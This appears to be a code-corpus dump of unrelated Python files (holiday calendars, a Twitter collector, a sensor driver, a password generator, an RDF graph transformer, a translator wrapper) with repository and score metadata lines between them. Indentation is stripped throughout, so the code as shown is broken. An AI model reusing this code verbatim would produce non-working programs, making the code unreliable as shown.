def m_warn(self, m):
m = '[!] ' + m
if COLORAMA:
print Fore.YELLOW + m
else:
print m
def m_ok(self, m):
m = '[OK] ' + m
if COLORAMA:
print Fore.GREEN + m
else:
print m
def m_alert(self, m):
m = '[!!] ' + m
if COLORAMA:
print Fore.RED + m
else:
print m
def m_fatal(self, m):
m = '[X] ' + m
if COLORAMA:
print Fore.WHITE + Back.RED + m
else:
print m
def stop(self):
self.m_info("Restoring terminal...")
colorama.deinit()
| 2.71875
| 3
|
holidata/holidays/sv-SE.py
|
vice/holidata
| 0
|
12784805
|
# coding=utf-8
from dateutil.easter import EASTER_WESTERN
from holidata.utils import SmartDayArrow
from .holidays import Locale, Holiday
"""
source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/lag-1989253-om-allmanna-helgdagar_sfs-1989-253
source: https://www.riksdagen.se/sv/dokument-lagar/dokument/svensk-forfattningssamling/semesterlag-1977480_sfs-1977-480
"""
class sv_SE(Locale):
"""
01-01: [NF] Nyårsdagen
01-06: [NRF] Trettondedag jul
05-01: [NF] Första maj
06-06: [NF] Nationaldagen
12-24: [NRF] Julafton
12-25: [NRF] Juldagen
12-26: [NRF] Annandag jul
12-31: [NF] Nyårsafton
2 days before Easter: [NRV] Långfredagen
Easter: [NRV] Påskdagen
1 day after Easter: [NRV] Annandag påsk
39 days after Easter: [NRV] Kristi himmelsfärdsdag
49 days after Easter: [NRV] Pingstdagen
"""
locale = "sv-SE"
easter_type = EASTER_WESTERN
def __midsommar(self):
"""
Find the Saturday between 20 and 26 June
"""
return SmartDayArrow(self.year, 6, 19).shift_to_weekday('saturday', order=1, reverse=False)
def holiday_midsommarafton(self):
"""
The day before midsommardagen: [NV] Midsommarafton
"""
return [Holiday(
self.locale,
"",
self.__midsommar().shift(days=-1),
"Midsommarafton",
"NV"
)]
def holiday_midsommardagen(self):
"""
Saturday between 20 and 26 June: [NV] Midsommardagen
"""
return [Holiday(
self.locale,
"",
self.__midsommar(),
"Midsommardagen",
"NV"
)]
def holiday_alla_helgons_dag(self):
"""
Saturday between 31 October and 6 November: [NRV] Alla helgons dag
"""
return [Holiday(
self.locale,
"",
SmartDayArrow(self.year, 10, 30).shift_to_weekday('saturday', order=1, reverse=False),
"Alla helgons dag",
"NRV"
)]
| 2.8125
| 3
|
barry/samplers/__init__.py
|
AaronGlanville/Barry
| 13
|
12784806
|
from barry.samplers.dynesty_sampler import DynestySampler
from barry.samplers.ensemble import EnsembleSampler
from barry.samplers.metropolisHastings import MetropolisHastings
__all__ = ["EnsembleSampler", "DynestySampler", "MetropolisHastings"]
| 1.0625
| 1
|
twitter_streaming_collecter.py
|
jeanmidevacc/french-presidential-election-2022-data-collecter
| 1
|
12784807
|
import json
from datetime import datetime
import pandas as pd
import argparse
import boto3
import os
import itertools
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from urllib3.exceptions import ProtocolError
class StdOutListener(StreamListener):
def __init__(self, duration):
self.start_date = datetime.utcnow()
self.duration = duration
self.stop = False
self.data = []
def on_data(self, data):
tweet = json.loads(data)
self.data.append(tweet)
if (datetime.utcnow() - self.start_date).total_seconds() > self.duration:
self.stop = True
return False
return True
def on_error(self, status):
if (datetime.utcnow() - self.start_date).total_seconds() > self.duration:
self.stop = True
return False
return True
def set_job():
parser = argparse.ArgumentParser(description='Collect tweets')
parser.add_argument('--duration', type=int, help='Number of seconds before to stop the collecter', default=300)
parser.add_argument('--configuration', type=str, help='Configuration file for the job', default="./configuration.json")
parser.add_argument('--candidates', type=str, help='Candidates file for the job', default="./candidates.json")
args = parser.parse_args()
duration = args.duration
with open(args.configuration) as f:
configuration = json.load(f)
with open(args.candidates) as f:
candidates = json.load(f)
return duration, configuration, candidates
file_extension = ".csv.gz"
if __name__ == '__main__':
duration, configuration, candidates = set_job()
print(datetime.utcnow())
print(f'Will save the tweets for the next {duration} sec')
print(candidates)
filters = [[item["name"]] + item["twitter_account"] for key, item in candidates.items()]
filters = list(itertools.chain.from_iterable(filters))
filters = list(dict.fromkeys(filters))
print("Filters:", filters)
collecter = StdOutListener(duration)
auth = OAuthHandler(configuration["twitter"]["consumer_key"], configuration["twitter"]["consumer_secret"])
auth.set_access_token(configuration["twitter"]["access_token"], configuration["twitter"]["access_token_secret"])
stream = Stream(auth, collecter)
while not collecter.stop:
try:
stream.filter(track=filters, languages=["en","fr"])
except ProtocolError:
continue
dfp_tweets = pd.DataFrame(collecter.data)
file_name = collecter.start_date.strftime('%Y%m%d_%H%M%S') + file_extension
dfp_tweets.to_csv("tmp" + file_extension, index=None)
s3_client = boto3.client('s3', aws_access_key_id=configuration["aws"]["key"], aws_secret_access_key=configuration["aws"]["secret"])
partition = collecter.start_date.strftime('%Y%m%d')
response = s3_client.upload_file("tmp" + file_extension, configuration["aws"]["bucket"], f'data/raw/twitter/{partition}/{file_name}')
print(datetime.utcnow())
print('DONE')
| 2.9375
| 3
|
M01_Robocar/04. Environment Sensing/exercises/ultrasonic.py
|
acrobotic/EduKit
| 3
|
12784808
|
"""
09/01/2015
Author: Makerbro
Platforms: Raspberry Pi (Raspbian)
Language: Python
File: ultrasonic.py
------------------------------------------------------------------------
Description:
Define a simple class for using an HC-SR04 ultrasonic distance sensor.
------------------------------------------------------------------------
Please consider buying products from ACROBOTIC to help fund future
Open-Source projects like this! We'll always put our best effort in every
project, and release all our design files and code for you to use.
https://acrobotic.com/
------------------------------------------------------------------------
License:
Beerware License; if you find the code useful, and we happen to cross
paths, you're encouraged to buy us a beer. The code is distributed hoping
that you in fact find it useful, but without warranty of any kind.
"""
import RPi.GPIO as GPIO # Import GPIO library
import time # Import time library for sleep delay
# Class that will hold all the functions (methods) that the ultrasonic
# sensor will need
class Ultrasonic(object):
def __init__(self, trig_pin=0, echo_pin=0, mode=GPIO.BOARD):
'''
Initialize the pins, set them up
'''
self.trig_pin = trig_pin
self.echo_pin = echo_pin
GPIO.setmode(mode)
GPIO.setup(self.trig_pin, GPIO.OUT)
GPIO.setup(self.echo_pin, GPIO.IN)
GPIO.output(self.trig_pin, GPIO.LOW)
time.sleep(3)
def __exit__(self, type, value, traceback):
GPIO.cleanup(self.trig_pin)
GPIO.cleanup(self.echo_pin)
def range_cm(self):
GPIO.output(self.trig_pin, GPIO.HIGH)
time.sleep(10/1000/1000)
cutoff = time.time() + 0.60
GPIO.output(self.trig_pin, GPIO.LOW)
pulse_start = 0
pulse_stop = 0
while GPIO.input(self.echo_pin) == GPIO.LOW:
pulse_start = time.time()
if (pulse_start > cutoff):
return None
while GPIO.input(self.echo_pin) == GPIO.HIGH:
pulse_stop = time.time()
if (pulse_stop > cutoff):
return None
# Distance = one-way time of flight * speed of sound (~34000 cm/s)
distance = (pulse_stop - pulse_start) / 2 * 34000
distance = round(distance,1)
if distance >= 400 or distance <= 2:
return None
return distance
if __name__ == "__main__":
try:
import signal
import sys
def signal_handler(signal, frame):
GPIO.cleanup()
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
ultrasonic = Ultrasonic(trig_pin=15,echo_pin=13)
while True:
distance = ultrasonic.range_cm()
if distance:
print("Distance %s cm" % distance)
time.sleep(1)
except KeyboardInterrupt:
# here you put any code you want to run before the program
# exits when you press CTRL+C
print "Quiting..."
finally:
GPIO.cleanup() # this ensures a clean exit
| 3.390625
| 3
|
nxsdk_modules_ncl/csp/tests/__init__.py
|
event-driven-robotics/models
| 54
|
12784809
|
<reponame>event-driven-robotics/models
###############################################################
# INTEL CORPORATION CONFIDENTIAL AND PROPRIETARY
#
# Copyright © 2018-2021 Intel Corporation.
# This software and the related documents are Intel copyrighted
# materials, and your use of them is governed by the express
# license under which they were provided to you (License). Unless
# the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the
# related documents without Intel's prior written permission.
# This software and the related documents are provided as is, with
# no express or implied warranties, other than those that are
# expressly stated in the License.
###############################################################
| 0.988281
| 1
|
aulas_secao_16_atributos.py
|
Romuloro/Curso_udemy_geek_academy_python
| 0
|
12784810
|
<reponame>Romuloro/Curso_udemy_geek_academy_python<filename>aulas_secao_16_atributos.py
"""
Attributes -
In Python, attributes are divided into 3 groups:
- Instance attributes
- Class attributes
- Dynamic attributes
Instance attributes: attributes declared inside the constructor method.
Note: constructor method: a special method used to build the object.
"""
# Instance attributes: when we create instances/objects of a class, all of them will have these attributes.
class Lampada:
def __init__(self, voltagem, cor): # Método construtor
self.voltagem = voltagem
self.cor = cor
self.ligada = False
class ContaCorrente:
def __init__(self, numero, limite, saldo):
self.numero = numero
self.limite = limite
self.saldo = saldo
class Produto:
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = valor
# Public or private attributes
# Private attributes in Python: prefix the attribute name with __.
# Public attributes in Python: everything is public by default.
class Acesso:
def __init__(self, email, senha):
self.__email = email
self.__senha = senha
user = Acesso('<EMAIL>', '789456')
# print(user._Acesso__senha)  # Name mangling: private attributes can still be reached this way
# Class attributes: attributes declared directly on the class, i.e. outside the
# constructor. They are usually given an initial value, and that value is
# shared by every instance of the class.
p1 = Produto('Chocolate', 'Comida', 3.99)
p2 = Produto('Mouse', 'Hardware', 40.99)
# Refactoring the Produto class:
class ProdutoCoreto:
imposto = 1.05
def __init__(self, nome, descricao, valor):
self.nome = nome
self.descricao = descricao
self.valor = (valor * ProdutoCoreto.imposto)
p1_c = ProdutoCoreto('Chocolate', 'Comida', 3.99)
p2_c = ProdutoCoreto('Mouse', 'Hardware', 40.99)
print(p1.valor)
print(p2.valor)
print(p1_c.valor)
print(p2_c.valor)
# Dynamic attributes: instance attributes that can be created at runtime.
# Note: such an attribute belongs exclusively to the instance that created it.
# Deleting attributes: see the sketch below.
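# A minimal illustrative sketch (not part of the original lesson code): creating a
# dynamic attribute at runtime and then deleting it with `del`. The attribute name
# 'codigo_promocional' is made up for the example.
p_dinamico = ProdutoCoreto('Teclado', 'Hardware', 99.90)
p_dinamico.codigo_promocional = 'PROMO10'  # dynamic attribute: exists only on this instance
print(p_dinamico.codigo_promocional)
del p_dinamico.codigo_promocional  # accessing it after this line raises AttributeError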
| 4.15625
| 4
|
app.py
|
RuFalcon/password_generator
| 0
|
12784811
|
<reponame>RuFalcon/password_generator
from PyQt5.QtWidgets import (
QWidget,
QSlider,
QLabel,
QApplication,
QMainWindow,
QCheckBox,
QLineEdit)
from PyQt5 import uic
from PyQt5.QtGui import QIcon
import sys
import random
import string
class Window(QMainWindow):
def __init__(self):
super().__init__()
uic.loadUi('password.ui', self)
self.setGeometry(200, 200, 800, 553)
self.setWindowIcon(QIcon('images/password.svg'))
self.setFixedHeight(553)
self.setFixedWidth(800)
self.lowcase_letters = string.ascii_lowercase
self.upcase_letters = string.ascii_uppercase
self.digits = string.digits
self.punctuation = string.punctuation
self.password_characters = self.lowcase_letters + \
self.upcase_letters + self.digits
self.check_lowcase = self.findChild(QCheckBox, "check_lowcase")
self.state_changed(self.check_lowcase)
self.check_upcase = self.findChild(QCheckBox, "check_upcase")
self.state_changed(self.check_upcase)
self.check_numbers = self.findChild(QCheckBox, "check_numbers")
self.state_changed(self.check_numbers)
self.check_symbols = self.findChild(QCheckBox, "check_symbols")
self.state_changed(self.check_symbols)
self.slider = self.findChild(QSlider, "horizontalSlider")
self.slider.valueChanged.connect(self.changed_slider)
self.password = self.findChild(QLineEdit, "password")
self.password_length = self.findChild(QLabel, "password_length")
self.get_random_password(int(self.password_length.text()))
def state_changed(self, checkbox):
"""Отслеживаем изменения нажатия чекбоксов и вызываем функцию change_password"""
return checkbox.stateChanged.connect(self.change_password)
def changed_slider(self):
"""Отслеживаем значение слайдера и пересобираем пароль с такой же длиной"""
value = self.slider.value()
self.password_length.setText(str(value))
self.get_random_password(value)
def get_random_password(self, length):
"""Собираем пароль с заданной длиной"""
password = ''.join(random.choice(self.password_characters)
for i in range(length))
self.password.setText(str(password))
def change_password(self):
"""Меняем пароль в зависимости от включенных чекбоксов"""
self.password_characters = 'x'
if self.check_lowcase.isChecked():
self.password_characters += self.lowcase_letters
if self.check_upcase.isChecked():
self.password_characters += self.upcase_letters
if self.check_numbers.isChecked():
self.password_characters += self.digits
if self.check_symbols.isChecked():
self.password_characters += self.punctuation
self.get_random_password(int(self.password_length.text()))
app = QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
| 2.890625
| 3
|
tests/strategies.py
|
Padawan00123/pipsqueak3
| 0
|
12784812
|
import typing
import hypothesis
from hypothesis import strategies
from src.packages.rescue import Rescue as _Rescue
from src.packages.rat import Rat as _Rat
from src.packages.utils import sanitize, Platforms as _Platforms
import string
# Anything that isn't a whitespace other than the space character, and isn't a control character.
valid_characters = strategies.characters(blacklist_categories=["C", "Zl", "Zp"])
"""
Any character (ASCII / UNICODE) that isn't a control character or whitespace other than ' '.
"""
# Filtered by anything that doesn't make it through the sanitizer.
valid_text = (
strategies.text(valid_characters, min_size=10)
.filter(lambda data: sanitize(data) == data)
.filter(lambda data: data.isprintable())
)
"""
Generates probably valid text.
Shrinks towards smaller words.
"""
valid_word_chars = strategies.characters(blacklist_categories=["C", "Z"])
"""
Characters that are valid to be in a word
"""
valid_word = strategies.text(valid_word_chars, min_size=1)
"""
a single word (no whitespace)
Shrinks towards smaller words.
"""
valid_words = strategies.lists(valid_word, max_size=10)
"""
a list of valid words
Shrinks towards smaller lists and smaller words.
"""
_irc_nick_letters = strategies.characters(
whitelist_characters=f"{string.ascii_letters}{string.digits}" + r"\`_[]{}",
whitelist_categories=())
valid_irc_name = strategies.text(alphabet=_irc_nick_letters, min_size=3).filter(
lambda word: not word[0].isnumeric())
platform = strategies.sampled_from([_Platforms.PS, _Platforms.PC, _Platforms.XB])
""" Some platform """
rescue = strategies.builds(
_Rescue,
uuid=strategies.uuids(version=4), # generate some valid uuid4
client=valid_irc_name, # client should always be defined
# irc nickname may be any valid word, or None.
irc_nickname=strategies.one_of(valid_irc_name, strategies.none()),
platform=platform,
active=strategies.booleans(),
code_red=strategies.booleans(),
board_index=strategies.one_of(strategies.integers(min_value=1), strategies.none())
)
""" Strategy for generating a rescue. Shrinks towards smaller arguments """
def rescues(min_size: int, max_size: int):
""" builds a list of rescues, shrinks towards smaller lists and smaller rescues """
return strategies.lists(rescue, min_size=min_size, max_size=max_size,
unique_by=(
lambda case: case.irc_nickname, lambda case: case.board_index,
lambda case: case.client))
rat = strategies.builds(
_Rat,
uuid=strategies.uuids(version=4),
name=valid_word,
platforms=strategies.one_of(strategies.none(), platform)
)
""" Generates a valid rat object """
rats = strategies.lists(rat)
""" a list of rats """
| 2.78125
| 3
|
cloudrunner_server/db/versions/2ba9ac1cbd43_added_unique_for_name_in_tiers.py
|
ttrifonov/cloudrunner-server
| 2
|
12784813
|
"""Added unique for name in Tiers
Revision ID: <KEY>
Revises: 330568e8928c
Create Date: 2015-02-06 12:05:09.151253
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '330568e8928c'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_unique_constraint(op.f('uq_usagetiers_name'), 'usagetiers', ['name'])
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(op.f('uq_usagetiers_name'), 'usagetiers', type_='unique')
### end Alembic commands ###
| 0.925781
| 1
|
kgx/rdf_transformer.py
|
RTXteam/kgx
| 0
|
12784814
|
from collections import defaultdict
from typing import Union, Set, List
import click
import logging
import networkx as nx
import os
import rdflib
import uuid
from prefixcommons.curie_util import read_remote_jsonld_context
from rdflib import Namespace, URIRef
from rdflib.namespace import RDF, RDFS, OWL
from kgx.prefix_manager import PrefixManager
from kgx.rdf_graph_mixin import RdfGraphMixin
from kgx.transformer import Transformer
from kgx.utils.kgx_utils import get_toolkit
from kgx.utils.rdf_utils import find_category, property_mapping
biolink_prefix_map = read_remote_jsonld_context('https://biolink.github.io/biolink-model/context.jsonld')
# TODO: use OBO IRI from biolink model context once https://github.com/biolink/biolink-model/issues/211 is resolved
OBO = Namespace('http://purl.obolibrary.org/obo/')
OBAN = Namespace(biolink_prefix_map['OBAN'])
PMID = Namespace(biolink_prefix_map['PMID'])
BIOLINK = Namespace(biolink_prefix_map['@vocab'])
DEFAULT_EDGE_LABEL = 'related_to'
class RdfTransformer(RdfGraphMixin, Transformer):
"""
Transformer that parses RDF and loads triples, as nodes and edges, into a networkx.MultiDiGraph
This is the base class which is used to implement other RDF-based transformers.
"""
OWL_PREDICATES = [RDFS.subClassOf, OWL.sameAs, OWL.equivalentClass]
is_about = URIRef('http://purl.obolibrary.org/obo/IAO_0000136')
has_subsequence = URIRef('http://purl.obolibrary.org/obo/RO_0002524')
is_subsequence_of = URIRef('http://purl.obolibrary.org/obo/RO_0002525')
def __init__(self, source_graph: nx.MultiDiGraph = None):
super().__init__(source_graph)
self.ontologies = []
self.prefix_manager = PrefixManager()
self.toolkit = get_toolkit()
def parse(self, filename: str = None, input_format: str = None, provided_by: str = None) -> None:
"""
Parse a file, containing triples, into a rdflib.Graph
The file can be either a 'turtle' file or any other format supported by rdflib.
Parameters
----------
filename : str
File to read from.
input_format : str
The input file format. If None is provided then the format is guessed using rdflib.util.guess_format()
provided_by : str
Define the source providing the input file.
"""
rdfgraph = rdflib.Graph()
if input_format is None:
input_format = rdflib.util.guess_format(filename)
logging.info("Parsing {} with '{}' format".format(filename, input_format))
rdfgraph.parse(filename, format=input_format)
logging.info("{} parsed with {} triples".format(filename, len(rdfgraph)))
# TODO: use source from RDF
if provided_by:
self.graph_metadata['provided_by'] = [provided_by]
else:
if isinstance(filename, str):
self.graph_metadata['provided_by'] = [os.path.basename(filename)]
elif hasattr(filename, 'name'):
self.graph_metadata['provided_by'] = [filename.name]
self.load_networkx_graph(rdfgraph)
self.load_node_attributes(rdfgraph)
self.report()
def add_ontology(self, file: str) -> None:
"""
Load an ontology OWL into a Rdflib.Graph
# TODO: is there better way of pre-loading required ontologies?
"""
ont = rdflib.Graph()
logging.info("Parsing {}".format(file))
ont.parse(file, format=rdflib.util.guess_format(file))
self.ontologies.append(ont)
logging.info("{} parsed with {} triples".format(file, len(ont)))
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all required triples into networkx.MultiDiGraph
By default this method loads the following predicates,
- RDFS.subClassOf
- OWL.sameAs
- OWL.equivalentClass
- is_about (IAO:0000136)
- has_subsequence (RO:0002524)
- is_subsequence_of (RO:0002525)
This behavior can be overridden by providing a list of rdflib.URIRef that ought to be loaded
via the 'predicates' parameter.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
if predicates is None:
predicates = set()
predicates = predicates.union(self.OWL_PREDICATES, [self.is_about, self.is_subsequence_of, self.has_subsequence])
triples = rdfgraph.triples((None, None, None))
logging.info("Loading from rdflib.Graph to networkx.MultiDiGraph")
with click.progressbar(list(triples), label='Progress') as bar:
for s, p, o in bar:
if (p == self.is_about) and (p in predicates):
logging.info("Loading is_about predicate")
# if predicate is 'is_about' then treat object as publication
self.add_node_attribute(o, key=s, value='publications')
elif (p == self.is_subsequence_of) and (p in predicates):
logging.info("Loading is_subsequence_of predicate")
# if predicate is 'is_subsequence_of'
self.add_edge(s, o, self.is_subsequence_of)
elif (p == self.has_subsequence) and (p in predicates):
logging.info("Loading has_subsequence predicate")
# if predicate is 'has_subsequence', interpret the inverse relation 'is_subsequence_of'
self.add_edge(o, s, self.is_subsequence_of)
elif any(p.lower() == x.lower() for x in predicates):
logging.info("Loading {} predicate, additional predicate".format(p))
self.add_edge(s, o, p)
def load_node_attributes(self, rdfgraph: rdflib.Graph) -> None:
"""
This method loads the properties of nodes into networkx.MultiDiGraph
As there can be many values for a single key, all properties are lists by default.
        This method assumes that the graph edges have already been loaded (via load_networkx_graph()),
        and that every node has its IRI stored as an attribute.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
"""
logging.info("Loading node attributes from rdflib.Graph into networkx.MultiDiGraph")
with click.progressbar(self.graph.nodes(data=True), label='Progress') as bar:
for n, data in bar:
if 'iri' in data:
uriref = URIRef(data['iri'])
else:
provided_by = self.graph_metadata.get('provided_by')
logging.warning("No 'iri' property for {} provided by {}".format(n, provided_by))
continue
for s, p, o in rdfgraph.triples((uriref, None, None)):
if p in property_mapping:
# predicate corresponds to a property on subject
if not (isinstance(s, rdflib.term.BNode) and isinstance(o, rdflib.term.BNode)):
# neither subject nor object is a BNode
self.add_node_attribute(uriref, key=p, value=o)
elif isinstance(o, rdflib.term.Literal):
# object is a Literal
# i.e. predicate corresponds to a property on subject
self.add_node_attribute(uriref, key=p, value=o)
category = find_category(uriref, [rdfgraph] + self.ontologies)
logging.debug("Inferred '{}' as category for node '{}'".format(category, uriref))
if category is not None:
self.add_node_attribute(uriref, key='category', value=category)
class ObanRdfTransformer(RdfTransformer):
"""
Transformer that parses a 'turtle' file and loads triples, as nodes and edges, into a networkx.MultiDiGraph
This Transformer supports OBAN style of modeling where,
- it dereifies OBAN.association triples into a property graph form
- it reifies property graph into OBAN.association triples
"""
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all triples into networkx.MultiDiGraph
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
if not predicates:
predicates = set()
predicates = predicates.union(self.OWL_PREDICATES)
for rel in predicates:
triples = rdfgraph.triples((None, rel, None))
with click.progressbar(list(triples), label="Loading relation '{}'".format(rel)) as bar:
for s, p, o in bar:
if not (isinstance(s, rdflib.term.BNode) and isinstance(o, rdflib.term.BNode)):
self.add_edge(s, o, p)
# get all OBAN.associations
associations = rdfgraph.subjects(RDF.type, OBAN.association)
logging.info("Loading from rdflib.Graph into networkx.MultiDiGraph")
with click.progressbar(list(associations), label='Progress') as bar:
for association in bar:
edge_attr = defaultdict(list)
edge_attr['id'].append(str(association))
# dereify OBAN.association
subject = None
object = None
predicate = None
# get all triples for association
for s, p, o in rdfgraph.triples((association, None, None)):
if o.startswith(PMID):
edge_attr['publications'].append(o)
if p in property_mapping or isinstance(o, rdflib.term.Literal):
p = property_mapping.get(p, p)
if p == 'subject':
subject = o
elif p == 'object':
object = o
elif p == 'predicate':
predicate = o
else:
edge_attr[p].append(o)
if predicate is None:
logging.warning("No 'predicate' for OBAN.association {}; defaulting to '{}'".format(association, self.DEFAULT_EDGE_LABEL))
predicate = DEFAULT_EDGE_LABEL
if subject and object:
self.add_edge(subject, object, predicate)
for key, values in edge_attr.items():
for value in values:
self.add_edge_attribute(subject, object, predicate, key=key, value=value)
def uriref(self, identifier: str) -> URIRef:
"""
Generate a rdflib.URIRef for a given string.
Parameters
----------
identifier: str
Identifier as string.
Returns
-------
rdflib.URIRef
URIRef form of the input `identifier`
"""
if identifier in property_mapping:
uri = property_mapping[identifier]
else:
uri = self.prefix_manager.expand(identifier)
return URIRef(uri)
def save_attribute(self, rdfgraph: rdflib.Graph, object_iri: URIRef, key: str, value: Union[List[str], str]) -> None:
"""
Saves a node or edge attributes from networkx.MultiDiGraph into rdflib.Graph
Intended to be used within `ObanRdfTransformer.save()`.
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
object_iri: rdflib.URIRef
IRI of an object in the graph
key: str
The name of the attribute
value: Union[List[str], str]
The value of the attribute; Can be either a List or just a string
"""
element = self.toolkit.get_element(key)
if element is None:
return
if element.is_a == 'association slot' or element.is_a == 'node property':
if key in property_mapping:
key = property_mapping[key]
else:
key = URIRef('{}{}'.format(BIOLINK, element.name.replace(' ', '_')))
if not isinstance(value, (list, tuple, set)):
value = [value]
            for v in value:
                if element.range == 'iri type':
                    v = URIRef('{}{}'.format(BIOLINK, ''.join(v.title().split(' '))))
                rdfgraph.add((object_iri, key, rdflib.term.Literal(v)))
def save(self, filename: str = None, output_format: str = "turtle", **kwargs) -> None:
"""
Transform networkx.MultiDiGraph into rdflib.Graph that follow OBAN-style reification and export
this graph as a file (TTL, by default).
Parameters
----------
filename: str
Filename to write to
output_format: str
The output format; default: 'turtle'
kwargs: dict
Any additional arguments
"""
# Make a new rdflib.Graph() instance to generate RDF triples
rdfgraph = rdflib.Graph()
# Register OBAN URL prefix (http://purl.org/oban/) as `OBAN` in the namespace.
rdfgraph.bind('OBAN', str(OBAN))
# <http://purl.obolibrary.org/obo/RO_0002558> is currently stored as OBO:RO_0002558 rather than RO:0002558
# because of the bug in rdflib. See https://github.com/RDFLib/rdflib/issues/632
rdfgraph.bind('OBO', str(OBO))
rdfgraph.bind('biolink', str(BIOLINK))
# saving all nodes
for n, data in self.graph.nodes(data=True):
if 'iri' not in n:
uriRef = self.uriref(n)
else:
uriRef = URIRef(data['iri'])
for key, value in data.items():
if key not in ['id', 'iri']:
self.save_attribute(rdfgraph, uriRef, key=key, value=value)
# saving all edges
for u, v, data in self.graph.edges(data=True):
if 'relation' not in data:
raise Exception('Relation is a required edge property in the biolink model, edge {} --> {}'.format(u, v))
if 'id' in data and data['id'] is not None:
assoc_id = URIRef(data['id'])
else:
# generating a UUID for association
assoc_id = URIRef('urn:uuid:{}'.format(uuid.uuid4()))
rdfgraph.add((assoc_id, RDF.type, OBAN.association))
rdfgraph.add((assoc_id, OBAN.association_has_subject, self.uriref(u)))
rdfgraph.add((assoc_id, OBAN.association_has_predicate, self.uriref(data['relation'])))
rdfgraph.add((assoc_id, OBAN.association_has_object, self.uriref(v)))
for key, value in data.items():
if key not in ['subject', 'relation', 'object']:
self.save_attribute(rdfgraph, assoc_id, key=key, value=value)
# Serialize the graph into the file.
rdfgraph.serialize(destination=filename, format=output_format)
class RdfOwlTransformer(RdfTransformer):
"""
Transformer that parses an OWL ontology in RDF, while retaining class-class relationships.
"""
def load_networkx_graph(self, rdfgraph: rdflib.Graph = None, predicates: Set[URIRef] = None, **kwargs) -> None:
"""
Walk through the rdflib.Graph and load all triples into networkx.MultiDiGraph
Parameters
----------
rdfgraph: rdflib.Graph
Graph containing nodes and edges
predicates: list
A list of rdflib.URIRef representing predicates to be loaded
kwargs: dict
Any additional arguments
"""
triples = rdfgraph.triples((None, RDFS.subClassOf, None))
logging.info("Loading from rdflib.Graph to networkx.MultiDiGraph")
with click.progressbar(list(triples), label='Progress') as bar:
for s, p, o in bar:
# ignoring blank nodes
if isinstance(s, rdflib.term.BNode):
continue
pred = None
parent = None
# TODO: does this block load all relevant bits from an OWL?
if isinstance(o, rdflib.term.BNode):
# C SubClassOf R some D
for x in rdfgraph.objects(o, OWL.onProperty):
pred = x
for x in rdfgraph.objects(o, OWL.someValuesFrom):
parent = x
if pred is None or parent is None:
logging.warning("Do not know how to handle BNode: {}".format(o))
continue
else:
# C SubClassOf D (C and D are named classes)
pred = p
parent = o
self.add_edge(s, parent, pred)
relations = rdfgraph.subjects(RDF.type, OWL.ObjectProperty)
logging.info("Loading relations")
with click.progressbar(relations, label='Progress') as bar:
for relation in bar:
for _, p, o in rdfgraph.triples((relation, None, None)):
if o.startswith('http://purl.obolibrary.org/obo/RO_'):
self.add_edge(relation, o, p)
else:
self.add_node_attribute(relation, key=p, value=o)
self.add_node_attribute(relation, key='category', value='relation')
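# Illustrative usage sketch (the file names below are hypothetical, not from this repo):
# t = ObanRdfTransformer()
# t.parse('associations.ttl')              # loads OBAN-style associations into a networkx.MultiDiGraph
# t.save('output.ttl', output_format='turtle')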
| 2.25
| 2
|
final_project/machinetranslation/translator.py
|
moosaei/xzceb-flask_eng_fr
| 0
|
12784815
|
<filename>final_project/machinetranslation/translator.py<gh_stars>0
"Taranslator using IBM watson"
import os
from ibm_watson import LanguageTranslatorV3
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from dotenv import load_dotenv
load_dotenv()
apikey = os.environ['apikey']
url = os.environ['url']
authenticator = IAMAuthenticator(apikey)
language_translator = LanguageTranslatorV3(version='2018-05-01',authenticator=authenticator)
language_translator.set_service_url(url)
def englishtofrench(englishtext):
"Translat Englist to French"
if englishtext=="":
return ""
translation_new=language_translator.translate(text=englishtext ,model_id='en-fr').get_result()
frenchtext =translation_new['translations'][0]['translation']
return frenchtext
def frenchtoenglish(frenchtext):
"Translate French to English"
if frenchtext=="":
return ""
translation_new=language_translator.translate(text=frenchtext ,model_id='fr-en').get_result()
englishtext =translation_new['translations'][0]['translation']
return englishtext
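# Illustrative usage (requires valid 'apikey' and 'url' entries in the .env file;
# the outputs shown are only indicative):
# print(englishtofrench('Hello'))   # -> e.g. 'Bonjour'
# print(frenchtoenglish('Merci'))   # -> e.g. 'Thank you'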
| 2.71875
| 3
|
blatann/nrf/nrf_driver_types.py
|
teeheee/blatann
| 40
|
12784816
|
#
# Copyright (c) 2016 Nordic Semiconductor ASA
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# 3. Neither the name of Nordic Semiconductor ASA nor the names of other
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# 4. This software must only be used in or with a processor manufactured by Nordic
# Semiconductor ASA, or in or with a processor manufactured by a third party that
# is used in combination with a processor manufactured by Nordic Semiconductor.
#
# 5. Any software provided in binary or object form under this license must not be
# reverse engineered, decompiled, modified and/or disassembled.
#
